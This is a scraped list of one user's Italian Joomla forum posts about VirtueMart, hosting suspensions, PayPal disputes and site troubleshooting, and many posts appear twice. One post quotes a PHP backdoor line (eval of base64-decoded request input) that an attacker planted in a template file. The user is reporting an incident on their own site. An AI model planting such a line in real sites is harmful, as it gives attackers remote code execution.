1
Sicurezza / Re:Possibile bug su 1.5.26
« il: 13 Giu 2013, 09:06:32 »
eh sì lo so, hai proprio ragione.
Visualizza post
Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.
2
Sicurezza / Re:Possibile bug su 1.5.26
« il: 12 Giu 2013, 18:01:09 »
Allora Alex, ti ringrazio ancora, ma i risultati non erano collegati a voce di menu.
Allora cercando meglio ho trovato una risposta che forse potrebbe andare bene qui:
http://forum.joomla.it/index.php?topic=69998.0
Creo un menu con le voci delle categorie e imposto su nascondi.
Così dovrebbe funzionare.
Allora cercando meglio ho trovato una risposta che forse potrebbe andare bene qui:
http://forum.joomla.it/index.php?topic=69998.0
Creo un menu con le voci delle categorie e imposto su nascondi.
Così dovrebbe funzionare.
3
Sicurezza / Re:Possibile bug su 1.5.26
« il: 12 Giu 2013, 17:40:53 »
Ahn ... e poi a quanto pare è tutto opera del sito xxxindianxxx.com che tra l'altro vedo che hanno fatto una scorpacciata di hacking.
Ad ogni modo per chi arriva a questo post, linko questo sito molto utile e ricco di scan tools molto utili per rilevare malware e altro:
http://www.malwarehelp.org/test-your-online-security-privacy.html
Ad ogni modo per chi arriva a questo post, linko questo sito molto utile e ricco di scan tools molto utili per rilevare malware e altro:
http://www.malwarehelp.org/test-your-online-security-privacy.html
4
Sicurezza / Re:Possibile bug su 1.5.26
« il: 12 Giu 2013, 17:06:52 »
Ciao mitico Alex,
grazie mille per la risposta. Ora guardo. Non mi ero mai accorto che c'era la possibilità di togliere il filtro.
Indago subito.
Ti dirò, che nel fra tempo il sito è ora segnalato come sospettamente pericoloso e con malware. Azzardo a dire che sia il filtro perché il google webmaster tools mi segnalava solo questa pagina sospetta.
Essendoci il filtro, dove non è presente in nessun altra parte del sito, mi viene da pensare che sia quello la causa. Ma non ne posso essere certo.
Prima di ripristinare il sito volevo capire da dove erano passati questi maledetti.
Porca loca. Componenti esterni sono pochi e aggiornati.
grazie mille per la risposta. Ora guardo. Non mi ero mai accorto che c'era la possibilità di togliere il filtro.
Indago subito.
Ti dirò, che nel fra tempo il sito è ora segnalato come sospettamente pericoloso e con malware. Azzardo a dire che sia il filtro perché il google webmaster tools mi segnalava solo questa pagina sospetta.
Essendoci il filtro, dove non è presente in nessun altra parte del sito, mi viene da pensare che sia quello la causa. Ma non ne posso essere certo.
Prima di ripristinare il sito volevo capire da dove erano passati questi maledetti.
Porca loca. Componenti esterni sono pochi e aggiornati.
5
Sicurezza / Possibile bug su 1.5.26
« il: 12 Giu 2013, 09:57:09 »
Il google webmaster tools mi segnala che una pagina di un sito 1.5.26
(www. indirizzo .it/ ) /component/content/category/ (numero della categoria) .html
Compare un elenco di tutti gli articoli presente in quella categoria.
(visto che è solo un avvertimento di vulnerabilità non voglio postare l'inidirizzo del sito)
Ma è possibile aggiungere questo url alla fine di qualsiasi sito ancora in versione 1.5.26:
/component/content/category/(numero della categoria senza le virgole).html
In questa area compare il filtro: "filtro titolo"
Ecco, mi segnala che questa parte è vulnerabile.
Sapete dirmi come è possibile a questo punto disattivare la possibilità di ricerca e filtro titolo ?
Visto che tanto non mi serve
Non è collegato al cerca e potrebbe darsi che abbia trovato un bug.
(www. indirizzo .it/ ) /component/content/category/ (numero della categoria) .html
Compare un elenco di tutti gli articoli presente in quella categoria.
(visto che è solo un avvertimento di vulnerabilità non voglio postare l'inidirizzo del sito)
Ma è possibile aggiungere questo url alla fine di qualsiasi sito ancora in versione 1.5.26:
/component/content/category/(numero della categoria senza le virgole).html
In questa area compare il filtro: "filtro titolo"
Ecco, mi segnala che questa parte è vulnerabile.
Sapete dirmi come è possibile a questo punto disattivare la possibilità di ricerca e filtro titolo ?
Visto che tanto non mi serve
Non è collegato al cerca e potrebbe darsi che abbia trovato un bug.
6
Gestione e-commerce / Come gestire ordini PayPal in controversia su Virtuemart 1.9
« il: 21 Mag 2013, 11:12:41 »
Ciao a tutti,
su un sito con virtuemart ancora 1.9, attivo pienamente ormai a pieno regime da due anni e aggiornato all'ultima versione 1.9 e 1.5.26, mi è capitato questa cosa singolare:
- per un ordine andato a buon fine con PayPal (modulo incluso di deffault), a distanza di una settimana il cliente ha richiesto la controversia. Automaticamente lo stato dell'ordine si è aggiornato in annullato.
Vi sembra plausibile?
PayPal potrebbe riuscire a dare questa modifica?
In pratica
Il gestionale in generale chiede spiegazione quando il pagamento risulta pagato.
E' quindi stato impostato che quando paypal da l'input che la transazione sia andata a buon fine aggiorna lo stato in "Pagato".
Se l'ordine non viene completato per qualsiasi motivo va "in attesa".
Se il cliente invece a distanza di una settimana chiede invece la controversia è plausibile che il codice riceve "giustamente" l'indicazione che il pagamento sia congelato e messo in discussione quindi non andato a buon fine.
Quindi entra nello stato delle transazioni fallite e messe sotto "annullate".
Qui mi sà che c'è bisogno di personalizzare il modulo perché l'ordine al massimo dovrebbe in questo caso entrare in una nuova voce denominata per esempio:
-"Controversia PayPal"
O allora magari bloccare che lo stato si aggiorni.
Perché va bene che il cliente abbia richiesto il recesso ed è un suo diritto, ma in questo caso vorrei communque avere l'ultima da dire io.
su un sito con virtuemart ancora 1.9, attivo pienamente ormai a pieno regime da due anni e aggiornato all'ultima versione 1.9 e 1.5.26, mi è capitato questa cosa singolare:
- per un ordine andato a buon fine con PayPal (modulo incluso di deffault), a distanza di una settimana il cliente ha richiesto la controversia. Automaticamente lo stato dell'ordine si è aggiornato in annullato.
Vi sembra plausibile?
PayPal potrebbe riuscire a dare questa modifica?
In pratica
Il gestionale in generale chiede spiegazione quando il pagamento risulta pagato.
E' quindi stato impostato che quando paypal da l'input che la transazione sia andata a buon fine aggiorna lo stato in "Pagato".
Se l'ordine non viene completato per qualsiasi motivo va "in attesa".
Se il cliente invece a distanza di una settimana chiede invece la controversia è plausibile che il codice riceve "giustamente" l'indicazione che il pagamento sia congelato e messo in discussione quindi non andato a buon fine.
Quindi entra nello stato delle transazioni fallite e messe sotto "annullate".
Qui mi sà che c'è bisogno di personalizzare il modulo perché l'ordine al massimo dovrebbe in questo caso entrare in una nuova voce denominata per esempio:
-"Controversia PayPal"
O allora magari bloccare che lo stato si aggiorni.
Perché va bene che il cliente abbia richiesto il recesso ed è un suo diritto, ma in questo caso vorrei communque avere l'ultima da dire io.
7
Joomla! 1.6/1.7/2.5 / #sapevatelo - Richiesta di login in gestione template o installare estenzioni
« il: 15 Mag 2013, 17:43:19 »
Divento sempre di più un maniaco della sicurezza e oggi facendo un po di modifiche mi sono accorto ad un certo punto che per gestire il template o installare estensioni, il sistema mi buttava sempre fuori direttamente nella schermata di login adiminstrator. Reinserendo però password e user diceva che non era una procedura valida! 
Panico totale del lavoro fatto nelle ultime ore!
Raga ... alla fine visto che ero in modalità privata con il browser perché maniaco che i cookies mi riconoscano sempre in un sito che mi manda sempre pubblicità, ho poi scoperto che era quello a buttarmi fuori. Perché tolto la modalità privata(incognito) funziona!
Panico totale del lavoro fatto nelle ultime ore!
Raga ... alla fine visto che ero in modalità privata con il browser perché maniaco che i cookies mi riconoscano sempre in un sito che mi manda sempre pubblicità, ho poi scoperto che era quello a buttarmi fuori. Perché tolto la modalità privata(incognito) funziona!
8
Database / joomla.library:2006-JDatabase::getInstance: Could not connect to database
« il: 03 Gen 2013, 15:41:09 »Mmm... stavo facendo qualche prova su un template e mi è uscito questo.
Ora ho ripristinato tutto, ma sarei curioso di capire cosa non funzionava.
Qualcuno riesce a dirmi, per favore, più o meno cosa dice questa scritta al posto della visualizzazione del sito?
"joomla.library:2006 - JDatabase::getInstance: Could not connect to database
MySQL server has gone away SQL=select distinct reference_table from jos_jf_content"
9
Sezione dedicata ai Server / RISOLTOPunto di vista sospendere domini e account appena hanno un malware o spam
« il: 29 Dic 2012, 14:46:16 »
Eh già, visto così. Però i due siti erano su semidedicati, e uno con un ip proprio dedicato.
Ad ogni modo capisco.
Grazie per avermi condiviso il vs punto di vista.
Ad ogni modo per la cronaca, il sito con il malware era una versione di prova della 2.5 installata ad inizio primavera con virtuemart e non più aggiornata perché sviluppavo il sito in locale.
Il cracker bastardo l'ha buccato con:
< ? PHP
eval ( base 64_decode ( $_ REQUEST [' c_id ']));
? >
in /templates/ja_purity/showmessage.php
Ad ogni modo capisco.
Grazie per avermi condiviso il vs punto di vista.
Ad ogni modo per la cronaca, il sito con il malware era una versione di prova della 2.5 installata ad inizio primavera con virtuemart e non più aggiornata perché sviluppavo il sito in locale.
Il cracker bastardo l'ha buccato con:
< ? PHP
eval ( base 64_decode ( $_ REQUEST [' c_id ']));
? >
in /templates/ja_purity/showmessage.php
10
Sezione dedicata ai Server / RISOLTOPunto di vista sospendere domini e account appena hanno un malware o spam
« il: 29 Dic 2012, 13:34:34 »Prima di tutto auguro un felice anno nuovo a tutta la community.
Ho da un paio di anni a questa parte spostato piano piano dei siti che gestivo su un hosting provider italiano che usa il cPanel e altri servizi con cui mi trovo bene. Penso che faccia parte dei migliori in Italia.
Ma negli ultimi tempi mi hanno sospeso l'account dell'area di un sito di un mio cliente perché una mail di quella azienda era sospetta di spam. Con la garanzia di cancellare quella mail e altri aggiornamenti mi hanno riattivato tutto. Ma se dovesse ricapitare mi sospenderebbe tutto l'account.
Vi sembra giusto?
Voglio dire, sono ip diversi. Domini diversi. Gestisco con questo account diversi clienti. Se un mio cliente ha fatto SPAM devi sospendere tutto il mio account dove gestisco altri 10 siti?
L'altro giorno invece senza avvisare nuovamente mi sospendono tutti servizi leggati ad un altro sito con la motivazione: Malware
E che cavolo! Sarò stato preso di mira?
Cosa ne pensate?
Non mi sono mai capitati problemi del genere. Ho poi sempre aggiornato le versioni dei siti e non ho mai riscontrato attacchi. Però non sò cosa pensare. Questa è la procedura da seguire?
Tra l'altro è davvero strano perché il sito con il Malware era aggiornato all'ultima versione della 2.5 e in modalità "sito in aggiornamento" con tanto di login e password. Era un area ancora di prova per fare test e altro. Nessuno poteva accederci. Come sia stato possibile rivelare un Malware è un mistero.
(scusate se ho postato questa domanda nell'area sbagliata)
11
Joomla! 1.5 / Re:Non ricevo mail da chiedi informazioni su questo prodotto
« il: 20 Dic 2012, 14:58:58 »
Capisco. Ma i backup sai che esistono?
Se sgarri qualcosa servono anche per tornare indietro.
Ad ogni modo aggiornare la tua alla versione 26 è una cavolata e trovi tutti qui sul forum e nei download.
Sì le mail le ricevo. Lo SKU è il codice del prodotto.
Cmq lo spam lo devi combattere a monte e non solo con il tuo client di posta, che evidentemente ora ha riconosciuto il tuo sito fonte di spam. Arrivando dal tuo sito puoi impostare tutto quello che vuoi su tutte le mail del mondo. Le mail provengono sempre dal form del tuo server. Quindi non risolvi credo nulla con l'antispam su mail di Mac.
Cerca "codice captcha" per Virtuemart. Argomento ampiamente spiegato sia su questo forum sia su quello di vmitalia.net
Se sgarri qualcosa servono anche per tornare indietro.
Ad ogni modo aggiornare la tua alla versione 26 è una cavolata e trovi tutti qui sul forum e nei download.
Sì le mail le ricevo. Lo SKU è il codice del prodotto.
Cmq lo spam lo devi combattere a monte e non solo con il tuo client di posta, che evidentemente ora ha riconosciuto il tuo sito fonte di spam. Arrivando dal tuo sito puoi impostare tutto quello che vuoi su tutte le mail del mondo. Le mail provengono sempre dal form del tuo server. Quindi non risolvi credo nulla con l'antispam su mail di Mac.
Cerca "codice captcha" per Virtuemart. Argomento ampiamente spiegato sia su questo forum sia su quello di vmitalia.net
12
Joomla! 1.5 / Re:Accedo solo all'amministrazione
« il: 20 Dic 2012, 10:51:56 »Esatto.Una volta che hai ripristinato il sito fai l'aggiornamento.
13
Joomla! 1.5 / Re:Accedo solo all'amministrazione
« il: 20 Dic 2012, 10:40:23 »Non penso che sia dovuto a quello ma potrebbe anche esserlo.
Secondo te perché si rilascia aggiornamenti?
Cmq aggiornarla in quello stato non risolverai il problema. Se non hai installato parti terzi ultimamente e non hai fatto modifiche potrebbe essere un attacco da hacker. Ti conviene ripristinare backup del db e del server prima di procedere.
14
Joomla! 1.5 / Re:Accedo solo all'amministrazione
« il: 20 Dic 2012, 10:16:34 »
Ah ora che vedo il sito capisco. Accedi solo da backend e il sito invece da pagina bianca sforzandosi di caricare qualcosa ma non riesce.
Hai installato qualche plugin o moduli nuovi?
La versione è aggiornata alla 1.5.26?
Hai installato qualche plugin o moduli nuovi?
La versione è aggiornata alla 1.5.26?
15
Gestione e-commerce / VM 1.1.9: come eliminare SKU riportato nelle mail "chiedi info su un prodotto"
« il: 20 Dic 2012, 09:50:49 »
Versione: Virtuemart 1.1.9
Problema: devo eliminare ogni traccia degli SKU. Ci sono riuscito da per tutto tranne per la mail che arriva al cliente quando inviando la sua richiesta tramite "chiedi informazioni su questo prodotto" riporta lo SKU.
Tentativi già eseguiti: ho trovato due file che credo siano responsabili di questo, ma ancora niente.
- administrator<components<com_virtuemart<html<shop.ask.php
- components<com_virtuemart<themes<(nome template)<templates<pages<shop.ask.tpl.php
Qualcuno riesce a darmi una mano please?
Problema: devo eliminare ogni traccia degli SKU. Ci sono riuscito da per tutto tranne per la mail che arriva al cliente quando inviando la sua richiesta tramite "chiedi informazioni su questo prodotto" riporta lo SKU.
Tentativi già eseguiti: ho trovato due file che credo siano responsabili di questo, ma ancora niente.
- administrator<components<com_virtuemart<html<shop.ask.php
- components<com_virtuemart<themes<(nome template)<templates<pages<shop.ask.tpl.php
Qualcuno riesce a darmi una mano please?
16
Joomla! 1.5 / Re:Non ricevo mail da chiedi informazioni su questo prodotto
« il: 20 Dic 2012, 09:28:55 »1) quale antispam hai usato?
2) 1.5.22 ? Cosa ti blocca a portarla alla 1.5.26?
... io invece stò cercando di togliere lo SKU che riporta
nelle email che arrivano da "chiedi informazioni ..."
17
Gestione e-commerce / Form B2B in tabella che calcola ordine da inviare
« il: 13 Nov 2012, 17:07:24 »
Ciao a tutti,
un consiglio. Devo creare un form che mi calcoli in automatico il costo dei prodotti fleggati e quindi IVA e totale da inviare in amministrazione.
Devo creare per un cliente solo questo form. Si tratta di un attività B2B e non vuole creare un e commerce.
Quindi il form dovrà essere sotto tabella con 33 prodotti.
Il cliente business partner flegga i prodotti desiderati.
Quantità, mette i suoi dati e invia il tutto.
Qualche idea?
Cosa mi consigliate?
Stò cercando da qualche ore ma non ne vengo a capo.
Grazie
un consiglio. Devo creare un form che mi calcoli in automatico il costo dei prodotti fleggati e quindi IVA e totale da inviare in amministrazione.
Devo creare per un cliente solo questo form. Si tratta di un attività B2B e non vuole creare un e commerce.
Quindi il form dovrà essere sotto tabella con 33 prodotti.
Il cliente business partner flegga i prodotti desiderati.
Quantità, mette i suoi dati e invia il tutto.
Qualche idea?
Cosa mi consigliate?
Stò cercando da qualche ore ma non ne vengo a capo.
Grazie
18
Joomla! 1.5 / Re:Errore file xml - Plimun Nivo Slider
« il: 31 Ago 2012, 09:41:00 »Dice che c'è un errore alla linea 9.
Ti dovrebbe uscire :
Il path assoluto è: (e qui il percorso giusto che porta alla home)
Tu hai copiato il testo?
Incollato su un foglio di testo pulito
e salvato con la dicitura path.php ?
Se fai come ti dico funziona.
19
Joomla! 1.5 / Re:Errore file xml - Plimun Nivo Slider
« il: 30 Ago 2012, 16:16:20 »
nella root principale nel file configuration.php
Da li vedi se i percorsi sono giusti.
Crea una pagina con questo commando php:
<?php
$path = getcwd();
echo "Il path assoluto è:
";
echo $path
?>
e salvi la pagina con il nome path.php, la carichi nella
root. La vai a richiamare sul browser all'indirizzo:
www.tuosito.it/path.php
e ti dà l'indirizzo giusto.
Se combacia con quello cha hai già, allora non è lì il
problema.
Versione tua di joomla?
Compatibilità con la versione?
Da li vedi se i percorsi sono giusti.
Crea una pagina con questo commando php:
<?php
$path = getcwd();
echo "Il path assoluto è:
";
echo $path
?>
e salvi la pagina con il nome path.php, la carichi nella
root. La vai a richiamare sul browser all'indirizzo:
www.tuosito.it/path.php
e ti dà l'indirizzo giusto.
Se combacia con quello cha hai già, allora non è lì il
problema.
Versione tua di joomla?
Compatibilità con la versione?
20
Joomla! 1.5 / Re:Errore file xml - Plimun Nivo Slider
« il: 30 Ago 2012, 15:40:18 »Ma nella cartela, un file xml c'è?
Da quest'errore solo a questo componente?
I percorsi di $log_path e $tmp_path sono giusti nel file configuration?
|
|